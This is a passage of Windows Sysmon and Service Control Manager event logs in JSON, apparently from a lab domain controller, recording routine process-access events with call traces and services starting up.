{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2145-5F25-0000-00106A6D0900}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2145-5F25-0000-00106A6D0900}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-2145-5F25-0000-00106A6D0900}\r\nSourceProcessId: 3264\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2145-5F25-0000-0010EA6C0900}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-2145-5F25-0000-00106A6D0900}","SourceProcessId":"3264","SourceThreadId":"4456","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2145-5F25-0000-0010EA6C0900}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.240\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2145-5F25-0000-0010EA6C0900}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.240","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2145-5F25-0000-0010EA6C0900}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76865,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.272\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1872\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2145-5F25-0000-0010EA6C0900}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.272","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1872","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2145-5F25-0000-0010EA6C0900}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.287\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.287","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.287\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.287","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76866,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 